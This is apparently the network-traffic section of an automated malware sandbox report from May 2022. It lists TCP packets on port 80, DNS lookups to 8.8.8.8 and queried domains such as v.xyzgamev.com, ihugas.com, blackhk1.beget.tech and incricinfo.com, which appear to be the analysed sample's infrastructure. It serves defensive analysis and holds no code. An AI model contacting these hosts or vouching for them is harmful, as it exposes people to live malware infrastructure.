                                                                                                                          May 21, 2022 09:31:05.695951939 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.695987940 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.695997000 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.696001053 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.696003914 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.696047068 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.696088076 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.696100950 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.696137905 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.696145058 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.696187019 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.696201086 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.696208000 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.696229935 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.696268082 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.696284056 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.696309090 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.696309090 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.696315050 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.696350098 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.696388960 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.696429014 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.696466923 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.696486950 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.696496010 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.696502924 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.696508884 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.696513891 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.696547985 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.696589947 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.696630955 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.696670055 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.696712017 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.696752071 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.696770906 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.696782112 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.696788073 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.696794033 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.696794987 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.696799994 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.696841002 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.696880102 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.696922064 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.696963072 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.697001934 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.697038889 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.697041988 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.697057009 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.697086096 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.697127104 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.697134972 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.697144032 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.697156906 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.697168112 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.697194099 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.697206974 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.697252035 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.697293043 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.697308064 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.697331905 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.697339058 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.697346926 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.697372913 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.697385073 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.697415113 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.697455883 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.697496891 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.697536945 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.697568893 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.697577953 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.697578907 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.697598934 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.697603941 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.697619915 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.697659969 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.697700977 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.697714090 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.697741032 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.697741985 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.697772980 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.697782993 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.697832108 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.697870970 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.697911978 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.697913885 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.697922945 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.697927952 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.697932959 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.697953939 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.697969913 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.697993994 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.698035955 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.698200941 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.698210955 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.698225975 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.698254108 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.698295116 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.698321104 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.698334932 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.698375940 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.698385000 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.698404074 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.698415041 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.698457956 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.698499918 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.698515892 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.698523998 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.698528051 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.698618889 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.698651075 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.698692083 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.698751926 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.698760986 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.698786020 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.698832035 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.698848009 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.698870897 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.698910952 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.698951006 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.699006081 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.699065924 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.699107885 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.699124098 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.699135065 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.699139118 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.699143887 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.699150085 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.699152946 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.699192047 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.699232101 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.700522900 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.701076031 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.841936111 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.842096090 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.878927946 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.883845091 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.920747042 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.920809984 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.920900106 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.921489954 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.957731009 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.957789898 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.957969904 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.957999945 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.958137989 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.958178997 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.958906889 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.994775057 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.994826078 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.994868994 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.994905949 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.994910002 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.994931936 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.994956017 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.995459080 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.995501995 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.995541096 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:05.995549917 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.995563030 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.999435902 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:05.999747038 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:06.031704903 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:06.031761885 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:06.031801939 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:06.031841993 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:06.031884909 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:06.031924963 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:06.031969070 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:06.031996965 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:06.032005072 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:06.032010078 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:06.034207106 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:07.418533087 CEST4976680192.168.2.45.101.153.227
                                                                                                                          May 21, 2022 09:31:07.486285925 CEST80497665.101.153.227192.168.2.4
                                                                                                                          May 21, 2022 09:31:07.487509012 CEST4976680192.168.2.45.101.153.227
                                                                                                                          May 21, 2022 09:31:07.491874933 CEST4976680192.168.2.45.101.153.227
                                                                                                                          May 21, 2022 09:31:07.558665991 CEST80497665.101.153.227192.168.2.4
                                                                                                                          May 21, 2022 09:31:07.559165001 CEST4976680192.168.2.45.101.153.227
                                                                                                                          May 21, 2022 09:31:07.626185894 CEST80497665.101.153.227192.168.2.4
                                                                                                                          May 21, 2022 09:31:07.626313925 CEST80497665.101.153.227192.168.2.4
                                                                                                                          May 21, 2022 09:31:07.626487970 CEST4976680192.168.2.45.101.153.227
                                                                                                                          May 21, 2022 09:31:07.627018929 CEST4976680192.168.2.45.101.153.227
                                                                                                                          May 21, 2022 09:31:07.693911076 CEST80497665.101.153.227192.168.2.4
                                                                                                                          May 21, 2022 09:31:08.086178064 CEST4976780192.168.2.4103.147.182.42
                                                                                                                          May 21, 2022 09:31:08.281394005 CEST8049767103.147.182.42192.168.2.4
                                                                                                                          May 21, 2022 09:31:08.281793118 CEST4976780192.168.2.4103.147.182.42
                                                                                                                          May 21, 2022 09:31:08.282486916 CEST4976780192.168.2.4103.147.182.42
                                                                                                                          May 21, 2022 09:31:08.477251053 CEST8049767103.147.182.42192.168.2.4
                                                                                                                          May 21, 2022 09:31:08.477375031 CEST4976780192.168.2.4103.147.182.42
                                                                                                                          May 21, 2022 09:31:08.672137022 CEST8049767103.147.182.42192.168.2.4
                                                                                                                          May 21, 2022 09:31:08.673968077 CEST8049767103.147.182.42192.168.2.4
                                                                                                                          May 21, 2022 09:31:08.674047947 CEST8049767103.147.182.42192.168.2.4
                                                                                                                          May 21, 2022 09:31:08.674072981 CEST8049767103.147.182.42192.168.2.4
                                                                                                                          May 21, 2022 09:31:08.674181938 CEST4976780192.168.2.4103.147.182.42
                                                                                                                          May 21, 2022 09:31:08.674211979 CEST4976780192.168.2.4103.147.182.42
                                                                                                                          May 21, 2022 09:31:08.674845934 CEST4976780192.168.2.4103.147.182.42
                                                                                                                          May 21, 2022 09:31:08.869220018 CEST8049767103.147.182.42192.168.2.4
                                                                                                                          May 21, 2022 09:31:09.476938963 CEST4976880192.168.2.4103.147.182.42
                                                                                                                          May 21, 2022 09:31:09.671900988 CEST8049768103.147.182.42192.168.2.4
                                                                                                                          May 21, 2022 09:31:09.675081968 CEST4976880192.168.2.4103.147.182.42
                                                                                                                          May 21, 2022 09:31:09.676897049 CEST4976880192.168.2.4103.147.182.42
                                                                                                                          May 21, 2022 09:31:09.871768951 CEST8049768103.147.182.42192.168.2.4
                                                                                                                          May 21, 2022 09:31:09.871892929 CEST4976880192.168.2.4103.147.182.42
                                                                                                                          May 21, 2022 09:31:10.066627979 CEST8049768103.147.182.42192.168.2.4
                                                                                                                          May 21, 2022 09:31:10.067190886 CEST8049768103.147.182.42192.168.2.4
                                                                                                                          May 21, 2022 09:31:10.067342997 CEST8049768103.147.182.42192.168.2.4
                                                                                                                          May 21, 2022 09:31:10.067372084 CEST8049768103.147.182.42192.168.2.4
                                                                                                                          May 21, 2022 09:31:10.068083048 CEST4976880192.168.2.4103.147.182.42
                                                                                                                          May 21, 2022 09:31:10.068133116 CEST4976880192.168.2.4103.147.182.42
                                                                                                                          May 21, 2022 09:31:10.262861013 CEST8049768103.147.182.42192.168.2.4
                                                                                                                          May 21, 2022 09:31:10.357269049 CEST4976980192.168.2.4103.147.182.42
                                                                                                                          May 21, 2022 09:31:10.543826103 CEST8049765151.115.10.1192.168.2.4
                                                                                                                          May 21, 2022 09:31:10.544231892 CEST4976580192.168.2.4151.115.10.1
                                                                                                                          May 21, 2022 09:31:10.551812887 CEST8049769103.147.182.42192.168.2.4
                                                                                                                          May 21, 2022 09:31:10.552036047 CEST4976980192.168.2.4103.147.182.42
                                                                                                                          May 21, 2022 09:31:10.552264929 CEST4976980192.168.2.4103.147.182.42
                                                                                                                          May 21, 2022 09:31:10.745776892 CEST8049769103.147.182.42192.168.2.4
                                                                                                                          May 21, 2022 09:31:10.747304916 CEST4976980192.168.2.4103.147.182.42
                                                                                                                          May 21, 2022 09:31:10.959949017 CEST8049769103.147.182.42192.168.2.4
                                                                                                                          May 21, 2022 09:31:10.959985018 CEST8049769103.147.182.42192.168.2.4
                                                                                                                          May 21, 2022 09:31:10.960001945 CEST8049769103.147.182.42192.168.2.4
                                                                                                                          May 21, 2022 09:31:10.960017920 CEST8049769103.147.182.42192.168.2.4
                                                                                                                          May 21, 2022 09:31:10.960153103 CEST4976980192.168.2.4103.147.182.42
                                                                                                                          May 21, 2022 09:31:10.972300053 CEST4976980192.168.2.4103.147.182.42
                                                                                                                          May 21, 2022 09:31:11.164774895 CEST8049769103.147.182.42192.168.2.4
                                                                                                                          May 21, 2022 09:31:11.842628002 CEST4977080192.168.2.4103.147.182.42
                                                                                                                          May 21, 2022 09:31:12.044620037 CEST8049770103.147.182.42192.168.2.4
                                                                                                                          May 21, 2022 09:31:12.044810057 CEST4977080192.168.2.4103.147.182.42
                                                                                                                          May 21, 2022 09:31:12.045074940 CEST4977080192.168.2.4103.147.182.42
                                                                                                                          May 21, 2022 09:31:12.248963118 CEST8049770103.147.182.42192.168.2.4
                                                                                                                          May 21, 2022 09:31:12.249232054 CEST4977080192.168.2.4103.147.182.42
                                                                                                                          May 21, 2022 09:31:12.451843023 CEST8049770103.147.182.42192.168.2.4
                                                                                                                          May 21, 2022 09:31:12.452373981 CEST8049770103.147.182.42192.168.2.4
                                                                                                                          May 21, 2022 09:31:12.452498913 CEST8049770103.147.182.42192.168.2.4
                                                                                                                          May 21, 2022 09:31:12.452533007 CEST8049770103.147.182.42192.168.2.4
                                                                                                                          May 21, 2022 09:31:12.452668905 CEST4977080192.168.2.4103.147.182.42
                                                                                                                          May 21, 2022 09:31:12.454435110 CEST4977080192.168.2.4103.147.182.42
                                                                                                                          May 21, 2022 09:31:12.454459906 CEST4977080192.168.2.4103.147.182.42
                                                                                                                          May 21, 2022 09:31:12.655885935 CEST8049770103.147.182.42192.168.2.4
                                                                                                                          May 21, 2022 09:31:12.931600094 CEST4977180192.168.2.4103.147.182.42
                                                                                                                          May 21, 2022 09:31:13.126857996 CEST8049771103.147.182.42192.168.2.4
                                                                                                                          May 21, 2022 09:31:13.128185987 CEST4977180192.168.2.4103.147.182.42
                                                                                                                          May 21, 2022 09:31:13.128241062 CEST4977180192.168.2.4103.147.182.42
                                                                                                                          May 21, 2022 09:31:13.323355913 CEST8049771103.147.182.42192.168.2.4
                                                                                                                          May 21, 2022 09:31:13.323458910 CEST4977180192.168.2.4103.147.182.42
                                                                                                                          May 21, 2022 09:31:13.518352985 CEST8049771103.147.182.42192.168.2.4
                                                                                                                          May 21, 2022 09:31:13.518909931 CEST8049771103.147.182.42192.168.2.4
                                                                                                                          May 21, 2022 09:31:13.519010067 CEST8049771103.147.182.42192.168.2.4
                                                                                                                          May 21, 2022 09:31:13.519042015 CEST8049771103.147.182.42192.168.2.4
                                                                                                                          May 21, 2022 09:31:13.519107103 CEST4977180192.168.2.4103.147.182.42
                                                                                                                          May 21, 2022 09:31:13.519134045 CEST4977180192.168.2.4103.147.182.42
                                                                                                                          May 21, 2022 09:31:13.519310951 CEST4977180192.168.2.4103.147.182.42
                                                                                                                          May 21, 2022 09:31:13.714124918 CEST8049771103.147.182.42192.168.2.4
                                                                                                                          May 21, 2022 09:31:14.079199076 CEST4977280192.168.2.4103.147.182.42
                                                                                                                          May 21, 2022 09:31:14.273040056 CEST8049772103.147.182.42192.168.2.4
                                                                                                                          May 21, 2022 09:31:14.273351908 CEST4977280192.168.2.4103.147.182.42
                                                                                                                          May 21, 2022 09:31:14.274044037 CEST4977280192.168.2.4103.147.182.42
                                                                                                                          May 21, 2022 09:31:14.466278076 CEST8049772103.147.182.42192.168.2.4
                                                                                                                          May 21, 2022 09:31:14.466432095 CEST4977280192.168.2.4103.147.182.42
                                                                                                                          May 21, 2022 09:31:14.658492088 CEST8049772103.147.182.42192.168.2.4
                                                                                                                          May 21, 2022 09:31:14.659001112 CEST8049772103.147.182.42192.168.2.4
                                                                                                                          May 21, 2022 09:31:14.659030914 CEST8049772103.147.182.42192.168.2.4
                                                                                                                          May 21, 2022 09:31:14.659044027 CEST8049772103.147.182.42192.168.2.4
                                                                                                                          May 21, 2022 09:31:14.659234047 CEST4977280192.168.2.4103.147.182.42
                                                                                                                          May 21, 2022 09:31:14.659832954 CEST4977280192.168.2.4103.147.182.42
                                                                                                                          May 21, 2022 09:31:14.851917028 CEST8049772103.147.182.42192.168.2.4

                                                                                                                          UDP Packets

                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          May 21, 2022 09:30:50.402553082 CEST6050653192.168.2.48.8.8.8
                                                                                                                          May 21, 2022 09:30:50.424741983 CEST53605068.8.8.8192.168.2.4
                                                                                                                          May 21, 2022 09:30:56.176079988 CEST6427753192.168.2.48.8.8.8
                                                                                                                          May 21, 2022 09:30:56.195359945 CEST53642778.8.8.8192.168.2.4
                                                                                                                          May 21, 2022 09:30:56.619935036 CEST5607653192.168.2.48.8.8.8
                                                                                                                          May 21, 2022 09:30:56.728522062 CEST53560768.8.8.8192.168.2.4
                                                                                                                          May 21, 2022 09:30:56.777267933 CEST6075853192.168.2.48.8.8.8
                                                                                                                          May 21, 2022 09:30:56.796691895 CEST53607588.8.8.8192.168.2.4
                                                                                                                          May 21, 2022 09:31:02.407352924 CEST6490953192.168.2.48.8.8.8
                                                                                                                          May 21, 2022 09:31:02.430766106 CEST53649098.8.8.8192.168.2.4
                                                                                                                          May 21, 2022 09:31:04.781173944 CEST6038153192.168.2.48.8.8.8
                                                                                                                          May 21, 2022 09:31:04.812433958 CEST53603818.8.8.8192.168.2.4
                                                                                                                          May 21, 2022 09:31:07.301409006 CEST5650953192.168.2.48.8.8.8
                                                                                                                          May 21, 2022 09:31:07.383193970 CEST53565098.8.8.8192.168.2.4
                                                                                                                          May 21, 2022 09:31:07.649024963 CEST5406953192.168.2.48.8.8.8
                                                                                                                          May 21, 2022 09:31:08.021091938 CEST53540698.8.8.8192.168.2.4
                                                                                                                          May 21, 2022 09:31:09.069931984 CEST5774753192.168.2.48.8.8.8
                                                                                                                          May 21, 2022 09:31:09.460917950 CEST53577478.8.8.8192.168.2.4
                                                                                                                          May 21, 2022 09:31:10.328913927 CEST5817153192.168.2.48.8.8.8
                                                                                                                          May 21, 2022 09:31:10.348727942 CEST53581718.8.8.8192.168.2.4
                                                                                                                          May 21, 2022 09:31:11.451950073 CEST5759453192.168.2.48.8.8.8
                                                                                                                          May 21, 2022 09:31:11.839039087 CEST53575948.8.8.8192.168.2.4
                                                                                                                          May 21, 2022 09:31:12.910957098 CEST6051253192.168.2.48.8.8.8
                                                                                                                          May 21, 2022 09:31:12.928256035 CEST53605128.8.8.8192.168.2.4
                                                                                                                          May 21, 2022 09:31:14.052808046 CEST6136153192.168.2.48.8.8.8
                                                                                                                          May 21, 2022 09:31:14.073185921 CEST53613618.8.8.8192.168.2.4
                                                                                                                          May 21, 2022 09:31:15.432081938 CEST5044553192.168.2.48.8.8.8
                                                                                                                          May 21, 2022 09:31:15.599462032 CEST53524728.8.8.8192.168.2.4

                                                                                                                          DNS Queries

                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                          May 21, 2022 09:30:50.402553082 CEST192.168.2.48.8.8.80xf41Standard query (0)v.xyzgamev.comA (IP address)IN (0x0001)
                                                                                                                          May 21, 2022 09:30:56.176079988 CEST192.168.2.48.8.8.80xeeb6Standard query (0)ip-api.comA (IP address)IN (0x0001)
                                                                                                                          May 21, 2022 09:30:56.619935036 CEST192.168.2.48.8.8.80x6611Standard query (0)ihugas.comA (IP address)IN (0x0001)
                                                                                                                          May 21, 2022 09:30:56.777267933 CEST192.168.2.48.8.8.80x8656Standard query (0)ihugas.comA (IP address)IN (0x0001)
                                                                                                                          May 21, 2022 09:31:02.407352924 CEST192.168.2.48.8.8.80x53a9Standard query (0)v.xyzgamev.comA (IP address)IN (0x0001)
                                                                                                                          May 21, 2022 09:31:04.781173944 CEST192.168.2.48.8.8.80xa50Standard query (0)cristaline.s3.pl-waw.scw.cloudA (IP address)IN (0x0001)
                                                                                                                          May 21, 2022 09:31:07.301409006 CEST192.168.2.48.8.8.80x9264Standard query (0)blackhk1.beget.techA (IP address)IN (0x0001)
                                                                                                                          May 21, 2022 09:31:07.649024963 CEST192.168.2.48.8.8.80x356bStandard query (0)incricinfo.comA (IP address)IN (0x0001)
                                                                                                                          May 21, 2022 09:31:09.069931984 CEST192.168.2.48.8.8.80xc3e9Standard query (0)incricinfo.comA (IP address)IN (0x0001)
                                                                                                                          May 21, 2022 09:31:10.328913927 CEST192.168.2.48.8.8.80x17d6Standard query (0)incricinfo.comA (IP address)IN (0x0001)
                                                                                                                          May 21, 2022 09:31:11.451950073 CEST192.168.2.48.8.8.80xd422Standard query (0)incricinfo.comA (IP address)IN (0x0001)
                                                                                                                          May 21, 2022 09:31:12.910957098 CEST192.168.2.48.8.8.80x3677Standard query (0)incricinfo.comA (IP address)IN (0x0001)
                                                                                                                          May 21, 2022 09:31:14.052808046 CEST192.168.2.48.8.8.80x41a9Standard query (0)incricinfo.comA (IP address)IN (0x0001)
                                                                                                                          May 21, 2022 09:31:15.432081938 CEST192.168.2.48.8.8.80xe47eStandard query (0)incricinfo.comA (IP address)IN (0x0001)

                                                                                                                          DNS Answers

                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
